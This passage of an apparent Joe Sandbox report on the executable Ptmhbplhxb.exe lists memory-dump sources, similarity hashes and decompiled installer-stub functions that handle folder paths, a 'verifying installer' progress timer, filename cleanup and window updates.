                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                • String ID: %s=%s$[Rename]
                • API String ID: 2171350718-1727408572
                • Opcode ID: 19f304a619b6baa61da18707e398eef91e4d1c241cf3942778bb5909504f8d3d
                • Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
                • Opcode Fuzzy Hash: 19f304a619b6baa61da18707e398eef91e4d1c241cf3942778bb5909504f8d3d
                • Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405F87 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199stringCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00405F87(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebdc; // 0x84bb3a
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f458;
				_t39 = 0x42e3a0;
				_t90 = 0x42e3a0;
				if(_a4 >= 0x42e3a0 && _a4 - 0x42e3a0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00405F87(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3a0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E00405F65(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00405EC3(_t90,  *0x42f408);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004061CF(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f40c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4a4;
						if( *0x42f4a4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f404;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f408,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f408,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405E4C((_t80 & 0x0000003f) +  *0x42f458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f458, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405F87(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00405F65(_a4, _t39);
			}



























                0x00405f87
                0x00405f87
                0x00405f87
                0x00405f8d
                0x00405f92
                0x00405f94
                0x00405fa3
                0x00405fa3
                0x00405fab
                0x00405fac
                0x00405fad
                0x00405fae
                0x00405fb1
                0x00405fb9
                0x00405fbb
                0x00405fd2
                0x00405fd5
                0x00405fd5
                0x004061ac
                0x004061ac
                0x004061b0
                0x00000000
                0x00000000
                0x00405fe2
                0x00405fe8
                0x00000000
                0x00000000
                0x00405fee
                0x00405fef
                0x00405ff2
                0x00405ff5
                0x0040619f
                0x004061a9
                0x004061ab
                0x004061ab
                0x004061a1
                0x004061a3
                0x004061a5
                0x004061a6
                0x004061a6
                0x00000000
                0x0040619f
                0x00405ffb
                0x00405fff
                0x0040600f
                0x00406016
                0x00406019
                0x00406021
                0x00406024
                0x0040602b
                0x0040602c
                0x0040602f
                0x0040614c
                0x0040614f
                0x0040617f
                0x00406182
                0x00406187
                0x0040618b
                0x0040618b
                0x00406190
                0x00406196
                0x00406198
                0x00000000
                0x00406198
                0x00406151
                0x00406154
                0x00406169
                0x00406170
                0x00406156
                0x0040615d
                0x0040615d
                0x00406178
                0x0040617b
                0x00406144
                0x00406145
                0x00406145
                0x00000000
                0x0040617b
                0x00406035
                0x0040603c
                0x0040603e
                0x0040603f
                0x00406059
                0x00406059
                0x00406060
                0x00406060
                0x00406067
                0x0040606b
                0x0040606b
                0x0040606c
                0x0040606e
                0x004060a7
                0x004060aa
                0x004060ba
                0x004060bd
                0x004060c5
                0x004060cb
                0x004060cb
                0x0040612a
                0x0040612a
                0x0040612c
                0x00000000
                0x00000000
                0x004060cf
                0x004060d6
                0x004060d7
                0x004060d9
                0x004060f3
                0x00406101
                0x00406107
                0x00406109
                0x00406127
                0x00406127
                0x00406127
                0x00000000
                0x00406127
                0x0040610f
                0x00406118
                0x0040611b
                0x00406121
                0x00406125
                0x00000000
                0x00000000
                0x00000000
                0x00406125
                0x004060db
                0x004060de
                0x00000000
                0x00000000
                0x004060ed
                0x004060ef
                0x004060f1
                0x00000000
                0x00000000
                0x00000000
                0x004060f1
                0x00000000
                0x0040612a
                0x004060b2
                0x00000000
                0x00406070
                0x0040608b
                0x00406090
                0x00406093
                0x00406133
                0x00406133
                0x00406137
                0x0040613f
                0x0040613f
                0x00000000
                0x00406137
                0x0040609d
                0x0040612e
                0x0040612e
                0x00406131
                0x00000000
                0x00000000
                0x00000000
                0x00406131
                0x0040606e
                0x00406041
                0x00406045
                0x00000000
                0x00000000
                0x00406047
                0x0040604b
                0x00000000
                0x00000000
                0x0040604d
                0x00406051
                0x00000000
                0x00406053
                0x00406053
                0x00000000
                0x00406053
                0x00406051
                0x004061b6
                0x004061c0
                0x004061cc
                0x004061cc
                0x00000000

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 004060B2
                • GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 004060C5
                • SHGetSpecialFolderLocation.SHELL32(004050C4,772EEA30,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 00406101
                • SHGetPathFromIDListA.SHELL32(772EEA30,0042E3A0), ref: 0040610F
                • CoTaskMemFree.OLE32(772EEA30), ref: 0040611B
                • lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
                • lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050C4,0042A050,00000000,00000000,00419517,772EEA30), ref: 00406191
                Strings
                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406081
                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406139
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 717251189-730719616
                • Opcode ID: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
                • Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
                • Opcode Fuzzy Hash: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
                • Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402C61 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402C61(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x415420; // 0x36e154
					_t11 =  *0x42142c; // 0x36e158
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                0x00402c6e
                0x00402c7c
                0x00402c82
                0x00402c82
                0x00402c90
                0x00402c92
                0x00402c98
                0x00402c9f
                0x00402ca1
                0x00402ca1
                0x00402cb7
                0x00402cc7
                0x00402cd9
                0x00402cd9
                0x00402ce1

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: T6$X6$verifying installer: %d%%
                • API String ID: 1451636040-1432654752
                • Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                • Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
                • Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                • Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004061CF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004061CF(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040596A(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405928("*?|<>/\":", _t5))) == 0) {
							E00405AB9(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                0x004061d1
                0x004061d9
                0x004061ed
                0x004061ed
                0x004061f3
                0x00406200
                0x00406200
                0x00406201
                0x00406203
                0x00406207
                0x00406209
                0x00406212
                0x00406214
                0x0040622e
                0x00406236
                0x00406236
                0x0040623b
                0x0040623d
                0x0040623f
                0x00406243
                0x00406244
                0x00406247
                0x0040624f
                0x00406251
                0x00406255
                0x00000000
                0x00000000
                0x0040625b
                0x00406260
                0x00000000
                0x00000000
                0x00000000
                0x00406260
                0x00406265

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ptmhbplhxb.exe",772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                • CharNextA.USER32(?,"C:\Users\user\Desktop\Ptmhbplhxb.exe",772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                • CharPrevA.USER32(?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
                Strings
                • *?|<>/":, xrefs: 00406217
                • "C:\Users\user\Desktop\Ptmhbplhxb.exe", xrefs: 0040620B
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004061D0
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 589700163-4039227058
                • Opcode ID: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
                • Instruction ID: ed3a47555f86895cac8e455d85beb05a749fa7fcd8deb799c497f9efd275ca90
                • Opcode Fuzzy Hash: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
                • Instruction Fuzzy Hash: D111E26180579029FB3226380C44B776F884F6A760F1900BFE8D2722C3CA7C5C62966E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040408D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040408D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                0x0040409f
                0x00404133
                0x00000000
                0x00404133
                0x004040b0
                0x004040b4
                0x00000000
                0x00000000
                0x004040ba
                0x004040c3
                0x004040c6
                0x004040c6
                0x004040cc
                0x004040d2
                0x004040d2
                0x004040de
                0x004040e4
                0x004040eb
                0x004040ee
                0x004040f1
                0x004040f3
                0x004040f3
                0x004040fb
                0x00404101
                0x00404101
                0x0040410b
                0x00404110
                0x00404113
                0x00404118
                0x0040411b
                0x0040411b
                0x0040412b
                0x0040412b
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                • Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
                • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                • Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040508C Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040508C(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ebe4; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4d4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405F87(0, _t39, 0x42a050, 0x42a050, _a4);
					}
					_t26 = lstrlenA(0x42a050);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebc8, 0x42a050);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a050;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a050)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a050, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                0x00405092
                0x0040509e
                0x004050a1
                0x004050a7
                0x004050b3
                0x004050b6
                0x004050b9
                0x004050bf
                0x004050bf
                0x004050c5
                0x004050cd
                0x004050d0
                0x004050ed
                0x004050f1
                0x004050fa
                0x004050fa
                0x00405104
                0x0040510d
                0x00405119
                0x00405120
                0x00405124
                0x00405127
                0x0040513a
                0x00405148
                0x00405148
                0x0040514c
                0x0040514e
                0x00405151
                0x00000000
                0x00405151
                0x004050d2
                0x004050da
                0x004050e2
                0x004050e8
                0x00000000
                0x004050e8
                0x004050e2
                0x004050d0
                0x0040515b

                APIs
                • lstrlenA.KERNEL32(0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                • lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                • lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,772EEA30), ref: 004050E8
                • SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                • Instruction ID: 508789985144291932d060d6ef0b432b589b283746e8f0e3613f73f9cddaab2c
                • Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                • Instruction Fuzzy Hash: 9E217A71A00518BFDB119FA5CD85EDFBFA9EB05354F14807AF944AA290C6398A418F98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404957 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404957(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                0x00404965
                0x00404972
                0x00404978
                0x004049b6
                0x004049b6
                0x004049c5
                0x004049cc
                0x00000000
                0x004049ce
                0x0040497a
                0x00404989
                0x00404991
                0x00404994
                0x004049a6
                0x004049ac
                0x004049b3
                0x00000000
                0x004049b3
                0x00000000

                APIs
                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
                • GetMessagePos.USER32 ref: 0040497A
                • ScreenToClient.USER32 ref: 00404994
                • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
